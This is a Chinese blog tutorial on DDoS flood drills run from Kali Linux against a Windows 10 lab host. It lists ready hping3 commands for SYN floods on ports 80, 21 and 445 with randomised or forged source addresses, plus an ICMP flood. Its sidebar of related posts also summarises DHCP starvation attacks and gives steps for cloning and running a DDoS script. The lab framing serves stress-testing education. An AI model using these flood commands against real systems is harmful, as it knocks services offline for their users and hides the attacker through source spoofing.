利用Kali进行DDOS泛洪演练

最新推荐文章于 2024-05-05 12:01:05 发布
最新推荐文章于 2024-05-05 12:01:05 发布
阅读量5.6k 收藏 81
点赞数 5
分类专栏: 渗透测试 Kali 文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/worwick/article/details/126450675
版权

本文仅对技术部分进行详解,不涉及相关演练模板。找模板的出门右拐。

1.准备阶段

1.1物理机或虚拟机

Kali:192.168.199.176

win10:192.168.199.180

(前提:保证2台机器能够互相ping通,ping不通可以尝试检查win10网络发现和防火墙)

1.2 目标机器启用web服务

Win10上用python 启动http服务。快速模拟出一个web服务:

为什么启用web服务,不直接对tcp端口或者icmp协议进行泛洪,后面补充   --注释1

不同版本python命令略有不同:

Python <= 2.3
python -c "import SimpleHTTPServer as s; s.test();" 8000

Python >= 2.4
python -m SimpleHTTPServer 8000

Python 3.x
python -m http.server 8000

2.实施阶段

2.1这里用到Kali 自带工具Hping3来进行DDOS攻击。

 2.2启动http服务:

win10这里用python3.8开http服务8090端口,并查看该端口连接进程。 

2.3模拟攻击:

kali使用以下命令进行模拟攻击

hping3 -c 100000 -d 120 -S -w 64 -p 80 --flood --rand-source 目标IP/域名
#-p 80 目标系统的web服务端口
#--rand-source 随机源IP;如实验需要看到真实源IP,请去掉这个参数

 win10上查看端口连接情况,能看到大量端口连接来自kali虚拟机:

kali这边停止攻击能够看到发包的总数量: 

3.完成

至此,模拟攻击完成

 

一些多余的解释:

由于目标系统开放端口不确定,可能会受到防火墙的影响,而http端口可以直接确定,所以一般正式演练使用http服务,好进行检测和处置。

上面注释处只示例了以http 服务为范例,下面看下其他类型的泛洪:

(1)TCP   SYN泛洪:

hping3 -c 100000 -d 120 -S -w 64 -p 21 --flood --rand-source  目标ip/域名
# -p 21
#--rand-source 随机源IP
此类型为TCP SYN泛洪攻击,由于目标系统开放端口不确定,所以尝试445端口(win默认基本会开),而http端口可以直接确定。
hping3 -c 100000 -d 120 -S -w 64 -p 445 --flood  192.168.199.180

(2)ICMP 泛洪

hping3 -q -n --id 0 --icmp -d 445  --flood  目标IP/域名
#-d 445  端口
#可增加-a 1.1.1.1 伪造源IP为1.1.1.1
hping3 -q -n --id 0 --icmp -d 445  --flood  192.168.199.180

 由于ICMP协议没有端口连接情况,可通过长ping百度来查看丢包情况。现在设备性能较强,该现象用单一源攻击难以实现,可以通过多个源对同一目标系统攻击,实现该现象:

总结:

还有其他的命令,可以找资料进行复现,希望有心人评论区补充。有时间再写吧,就这样吧。

 

 

worwick
关注
  • 5
    点赞
  • 81
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
实验6-MAC泛洪、ICMP扫描.docx
05-15
MAC泛洪攻击与ICMP扫描实验报告 MAC泛洪攻击是一种常见的网络攻击方式,通过发送大量具有随机MAC地址的数据包,使交换机的MAC表满毕溢出,从而导致交换机将所有数据包广播发送出去。本实验的主要目的就是为了掌握...
Hacking with Kali (用Kali进行Hack)
10-26
advanced live disk available today, Kali Linux. AĞer this brief introduction, the chapter details how to find, download, install, and customize Kali Linux. Next a brief introduction to basic Linux ...
kali系统进行DoS攻击教程
pyb_123456的博客
09-14 852
设置kali系统的IP地址为192.168.2.2取得root权限设置IP地址 vim /etc/network/interfaces。
Kali Linux发动DDOS攻击
qq_64868579的博客
06-11 3564
DHCP通常被应用在大型局域网中,主要作用是集中地管理、分配IP地址,使网络环境中的主机动态地获取IP地址、网关地址、DNS服务器地址等信息,并能够提升地址的使用率。DHCP攻击的目标也是服务器,怀有恶意攻击攻击者伪造大量DHCP请求发送到服务器,这样DHCP服务器地址池中的IP地址很快就会分配完,从而导致合法用户无法申请到IP地址。执行攻击后,Yersinia会在本网段内不停发送请求数据包,很快HDCP服务器地址池内所有的有效IP地址都无法使用,新的用户将无法获取IP地址,整个网络陷入瘫痪状态。
Kali Linux三种网络攻击方法总结(DDoS、CC和ARP欺骗)
韩束一叶子
04-29 1462
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。现在,我的手机虽然可以上网,但是速度慢的出奇,几分钟都打不开一个网页图片,这就说明我们的ARP欺骗成功了。我的手机,IP位192.168.0.100就出现在了这里,我们就拿我的手机作为攻击目标,
【内网渗透】Mac地址泛洪攻击
qq_62604985的博客
04-25 868
Mac地址泛洪攻击
KALI应用篇(一)压力测试
qq_40424448的博客
04-01 6854
方法论 在简单了解了Linux的发展史并掌握了Linux的系统&操作逻辑后,KALI手册的第一课,就是如何进行有效的压力测试。在七层模型(OSI)中,压力测试通常会测试传输层和网络层,以保证系统的三要素(机密性、完整性、可用性)。 压力测试有着不同的测试原理,同时也有着不同的方法和工具。总的来说,大概可以分成三种,即1、LOT(专用设备、物联网设备)压力测试 2、基于IP传输协议的WAN压力测试 3、基于SIP\TCP\的互联网压力测试 在我阅读KALI手册时,我发现一个很重要的问题:作者
网络渗透测试——MAC泛洪攻击
weixin_65343361的博客
04-23 1166
使用Kali虚拟机对eNSP模拟交换机进行MAC地址泛洪攻击实验步骤
Kali常见攻击手段
最新发布
lvaolan的博客
05-05 1414
仅用于教程和科普,切勿做违法之事,否则后果自负。
利用kali破解wifi密码全过程.doc
10-23
利用kali破解wifi密码全过程.doc
python实现的防DDoS脚本
01-21
这篇博可以说连开场白都可以省掉了,之所以被DDoS,并不是因为惹了疯狗被追着咬,而是因为VC悲剧之后流量全到simplecd来了。 不仅如此,一些笨蛋们在抓站,一些笨蛋们在用迅雷下载,100Mbps的端口居然已经满负荷运作...
测试syn-flood等泛洪攻击的小软件
10-26
可以模拟syn flood udp flood等泛洪攻击的一款小软件,360会报警。
kali系统进行DoS攻击教程(虚拟机单人可玩)
2301_77296775的博客
11-01 337
DoS攻击是指恶意的攻击网络协议实现的缺陷或直接通过野蛮手段残忍地耗尽被攻击对象的资源,目的是让目标计算机或网络无法提供正常的服务或资源访问,使目标系统服务系统停止响应甚至崩溃,而在此攻击中并不包括侵入目标服务器或目标网络设备。这种攻击会导致资源的匮乏,无论计算机的处理速度多快、内存容量多大、网络带宽的速度多快都无法避免这种攻击带来的后果。造成DoS的攻击行为被称为DoS攻击,其目的是使计算机或网络无法提供正常的服务。点击编辑-->虚拟网络编辑器-->添加网络-->vmnet 4-->修改。
Kali常见攻击手段_kali攻击
分享Python知识
01-04 1602
Kali常见攻击手段_kali攻击
SYN FLOOD攻击和HTTP慢速攻击实验笔记
weixin_52034407的博客
04-10 1229
SYN FLOOD攻击和HTTP慢速攻击实验笔记
Kali Linux发动DDOS攻击_kali ddos,真的醉了
2401_83739503的博客
04-15 780
本书第﹖版以最新的Ubuntu 12.04为版本,循序渐进地向读者介绍了Linux 的基础应用、系统管理、网络应用、娱乐和办公、程序开发、服务器配置、系统安全等。执行攻击后,Yersinia会在本网段内不停发送请求数据包,很快HDCP服务器地址池内所有的有效IP地址都无法使用,新的用户将无法获取IP地址,整个网络陷入瘫痪状态。需要《Linux入门到精通》、《linux系统移植》、《Linux驱动开发入门实战》、《Linux开源网络全栈》电子书籍及教程的工程师朋友们劳烦您转发+评论。废话不多说,开始实战。
Kali Linux DDos攻击、CC攻击、ARP攻击
qq_61901169的博客
06-03 2223
注:Kali官网下载可以直接打开的2023版本的虚拟机无法运行。
ddos攻击工具_kail 工具使用(一) ddos 攻击
weixin_39916479的博客
11-29 670
1、什么是ddos攻击ddos:分布式拒绝服务攻击可以使很多的计算机在同一时间遭受到攻击,使攻击的目标无法正常使用,分布式拒绝服务攻击已经出现了很多次,导致很多的大型网站都出现了无法进行操作的情况,这样不仅仅会影响用户的正常使用,同时造成的经济损失也是非常巨大的.2、黑客为什么选择DDoS不同于其他恶意篡改数据或劫持类攻击DDoS简单粗暴,可以达到直接摧毁目标的目的。另外,相对其他攻击手段DD...
kali启动ddos
12-13
根据提供的引用内容,我可以为您提供以下步骤来启动DDoS攻击: 1. 打开Kali Linux系统并使用root账户登录。 2. 在桌面上打开终端。 3. 输入以下命令以下载DDoS攻击文件: ``` git clone https://gitee.com/httpchangyuancom/ddos ``` 4. 下载完成后,输入以下命令以进入DDoS攻击文件夹: ``` cd ddosmaster ``` 5. 输入以下命令以查看DDoS攻击文件夹中的文件: ``` ls ``` 6. 输入以下命令以启动DDoS攻击: ``` python ddos-attack.py ``` 注意:在启动DDoS攻击之前,请确保您已经获得了目标网站的授权。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值